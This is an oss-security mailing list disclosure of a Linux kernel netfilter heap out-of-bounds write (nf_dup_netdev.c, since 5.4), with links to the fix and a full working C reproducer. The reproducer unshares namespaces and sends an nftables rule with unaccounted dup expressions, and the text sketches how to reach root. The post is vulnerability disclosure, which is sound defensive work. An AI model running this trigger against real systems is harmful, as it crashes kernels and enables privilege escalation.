Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 21 Feb 2022 20:38:23 +0000
From: Nick Gregory <Nick.Gregory@...hos.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: Linux kernel: heap out of bounds write in nf_dup_netdev.c since 5.4

There is a heap out of bounds write in the function nft_fwd_dup_netdev_offload (nf_dup_netdev.c). This was introduced in 5.4-rc1 by https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=be2861dc36d77ff3778979b9c3c79ada4affa131, and is fixed by https://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git/commit/?id=b1a5983f56e371046dcf164f90bfaf704d2b89f6. I have created a sample LPE targeting Ubuntu 21.10 with KASLR disabled.

In nft_fwd_dup_netdev_offload, ctx->num_actions++ is used to offset into the flow->rule->action.entries array (nf_dup_netdev.c:67) when setting up dup or fwd flow rules on a chain with hardware offload enabled. However, there is a mismatch between the number of times the increment is performed and the number of allocated entries. The allocated array size is based on the number of nftables expressions that have expr.offload_flags & NFT_OFFLOAD_F_ACTION set (nf_tables_offload.c:97), but only the immediate expression type has this flag (dup and fwd do not). It's possible to manually create a rule with dup/fwd expressions that don't have a corresponding/preceding immediate, leading to an undersized entries array and an arbitrary number of out-of-bounds array writes. Although the affected code deals with hardware offload, it is reachable when targeting network devices that don't have offload functionality (e.g. lo), because the bug is triggered before the rule creation fails. Additionally, while nftables requires CAP_NET_ADMIN, we can unshare into a new network namespace to obtain this capability as a (normally) unprivileged user. The reproducer code below demonstrates all of this, and will likely immediately panic the system.

This can be turned into kernel ROP/local privilege escalation without too much difficulty, as one of the values that is written out of bounds is conveniently a pointer to a net_device structure. There are many opportunities for one of the OOB writes to land in another heap-allocated structure which then misuses it (type confusion, freeing it, etc.). Additionally, an OOB write could land in a buffer that is returned to userland, leaking the address of the net_device allocation.

Reproducer (build with gcc repro.c -o repro -lmnl -lnftnl):

#include <sys/types.h>
#include <arpa/inet.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>

#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>
#include <libnftnl/rule.h>
#include <libnftnl/expr.h>


/*
 * Raw value sent in NFTA_CHAIN_FLAGS to request hardware offload for the
 * chain. It is written by hand because the libnftnl version this was written
 * against does not expose a chain-flags attribute for it.
 */
enum { CHAIN_FLAG_HW_OFFLOAD = 2 };

/* Number of extra "dup" expressions that have no matching "immediate". */
enum { UNACCOUNTED_DUPS = 100 };

/*
 * Allocate an expression of the given type and append it to `rule`.
 * The rule owns the expression afterwards; the returned pointer is only
 * borrowed so the caller can set attributes on it. Exits on allocation
 * failure.
 */
static struct nftnl_expr *rule_new_expr(struct nftnl_rule *rule, const char *name)
{
    struct nftnl_expr *expr = nftnl_expr_alloc(name);

    if (expr == NULL) {
        err(1, "nftnl_expr_alloc(%s)", name);
    }
    nftnl_rule_add_expr(rule, expr);
    return expr;
}

/*
 * Finish the message currently being built in `batch` and move on to the
 * next slot. Exits if the message did not fit within the batch limit, since
 * a truncated batch would silently drop that message.
 */
static void batch_finish_msg(struct mnl_nlmsg_batch *batch)
{
    if (!mnl_nlmsg_batch_next(batch)) {
        errx(1, "netlink batch is full");
    }
}

/*
 * Build one nftables batch (table "x", netdev ingress chain "y" on "lo" with
 * the hardware-offload flag, and a rule containing one accounted-for dup plus
 * UNACCOUNTED_DUPS dup expressions without a preceding immediate) and send it
 * to the kernel over a NETLINK_NETFILTER socket.
 *
 * When not running as root, the program first re-executes itself through
 * `unshare -Urn` so that it runs inside new user and network namespaces.
 *
 * Returns 0 after the batch has been sent; exits with status 1 on any
 * local failure.
 */
int main(int argc, char **argv) {
    (void)argc;

    if (geteuid() != 0) {
        puts("re-execing with unshare");
        /* stdout may be fully buffered; flush so the message survives exec. */
        fflush(stdout);
        char *args[] = {
            "unshare",
            "-Urn",
            argv[0],
            NULL,
        };
        execvp("unshare", args);
        err(1, "unshare re-exec");
    }

    /* Table "x". */
    struct nftnl_table *table = nftnl_table_alloc();
    if (table == NULL) {
        err(1, "nftnl_table_alloc");
    }
    nftnl_table_set_str(table, NFTNL_TABLE_NAME, "x");
    nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0);

    /*
     * Chain "y": netdev ingress filter chain bound to "lo". The
     * hardware-offload flag is not set here; it is appended to the chain
     * message as a raw attribute when the batch is serialized.
     */
    struct nftnl_chain *chain = nftnl_chain_alloc();
    if (chain == NULL) {
        err(1, "nftnl_chain_alloc");
    }
    nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, "x");
    nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, "y");
    nftnl_chain_set_u32(chain, NFTNL_CHAIN_HOOKNUM, NF_NETDEV_INGRESS);
    nftnl_chain_set_u32(chain, NFTNL_CHAIN_PRIO, 10);
    nftnl_chain_set_str(chain, NFTNL_CHAIN_DEV, "lo");
    nftnl_chain_set_str(chain, NFTNL_CHAIN_TYPE, "filter");

    /* Rule in table "x", chain "y". */
    struct nftnl_rule *rule = nftnl_rule_alloc();
    if (rule == NULL) {
        err(1, "nftnl_rule_alloc");
    }
    nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, "x");
    nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, "y");

    struct nftnl_expr *expr;

    /* Load the packet's protocol into register 1 ... */
    expr = rule_new_expr(rule, "meta");
    nftnl_expr_set_u32(expr, NFTNL_EXPR_META_KEY, NFT_META_PROTOCOL);
    nftnl_expr_set_u32(expr, NFTNL_EXPR_META_DREG, NFT_REG_1);

    /* ... and compare it against the 16-bit value 8. */
    expr = rule_new_expr(rule, "cmp");
    nftnl_expr_set_u32(expr, NFTNL_EXPR_CMP_SREG, NFT_REG_1);
    nftnl_expr_set_u32(expr, NFTNL_EXPR_CMP_OP, NFT_CMP_EQ);
    nftnl_expr_set_u16(expr, NFTNL_EXPR_CMP_DATA, 8);

    /* Load 4 bytes at offset 16 of the network header into register 1 ... */
    expr = rule_new_expr(rule, "payload");
    nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_BASE, NFT_PAYLOAD_NETWORK_HEADER);
    nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_OFFSET, 16);
    nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_LEN, 4);
    nftnl_expr_set_u32(expr, NFTNL_EXPR_PAYLOAD_DREG, NFT_REG_1);

    /* ... and compare them against 0x0200007f. */
    expr = rule_new_expr(rule, "cmp");
    nftnl_expr_set_u32(expr, NFTNL_EXPR_CMP_SREG, NFT_REG_1);
    nftnl_expr_set_u32(expr, NFTNL_EXPR_CMP_OP, NFT_CMP_EQ);
    nftnl_expr_set_u32(expr, NFTNL_EXPR_CMP_DATA, 0x0200007f);

    /* This is a "normal" dup, which is accounted for (it has an immediate). */
    expr = rule_new_expr(rule, "immediate");
    nftnl_expr_set_u32(expr, NFTNL_EXPR_IMM_DREG, NFT_REG_1);
    nftnl_expr_set_u32(expr, NFTNL_EXPR_IMM_DATA, 1);

    expr = rule_new_expr(rule, "dup");
    nftnl_expr_set_u32(expr, NFTNL_EXPR_DUP_SREG_DEV, NFT_REG_1);

    /* These dups have no preceding immediate, so they are not accounted for. */
    for (int i = 0; i < UNACCOUNTED_DUPS; i++) {
        expr = rule_new_expr(rule, "dup");
        nftnl_expr_set_u32(expr, NFTNL_EXPR_DUP_SREG_DEV, NFT_REG_1);
    }

    /*
     * Serialize. libmnl requires the batch buffer to be twice the batch
     * limit, because a message is written past the limit before the library
     * detects that it does not fit.
     */
    const size_t batch_limit = (size_t)MNL_SOCKET_BUFFER_SIZE;
    char *buf = malloc(2 * batch_limit);
    if (buf == NULL) {
        err(1, "malloc");
    }

    struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(buf, batch_limit);
    if (batch == NULL) {
        err(1, "mnl_nlmsg_batch_start");
    }

    unsigned int seq = 0;
    struct nlmsghdr *nlh;

    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    batch_finish_msg(batch);

    nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
                                      NFT_MSG_NEWTABLE, NFPROTO_NETDEV,
                                      0, seq++);
    nftnl_table_nlmsg_build_payload(nlh, table);
    batch_finish_msg(batch);

    nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
                                      NFT_MSG_NEWCHAIN, NFPROTO_NETDEV,
                                      NLM_F_CREATE, seq++);
    nftnl_chain_nlmsg_build_payload(nlh, chain);
    /* Append the hardware-offload chain flag by hand (see CHAIN_FLAG_HW_OFFLOAD). */
    mnl_attr_put_u32(nlh, NFTA_CHAIN_FLAGS, htonl(CHAIN_FLAG_HW_OFFLOAD));
    batch_finish_msg(batch);

    nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
                                     NFT_MSG_NEWRULE, NFPROTO_NETDEV,
                                     NLM_F_CREATE | NLM_F_APPEND, seq++);
    nftnl_rule_nlmsg_build_payload(nlh, rule);
    batch_finish_msg(batch);

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    batch_finish_msg(batch);

    /* Send the whole batch in one datagram. */
    struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER);
    if (nl == NULL) {
        err(1, "mnl_socket_open");
    }

    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
                          mnl_nlmsg_batch_size(batch)) < 0) {
        err(1, "mnl_socket_send");
    }

    /* Release everything acquired above. */
    mnl_socket_close(nl);
    mnl_nlmsg_batch_stop(batch);
    free(buf);
    nftnl_rule_free(rule); /* also frees the expressions attached to the rule */
    nftnl_chain_free(chain);
    nftnl_table_free(table);

    return 0;
}

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.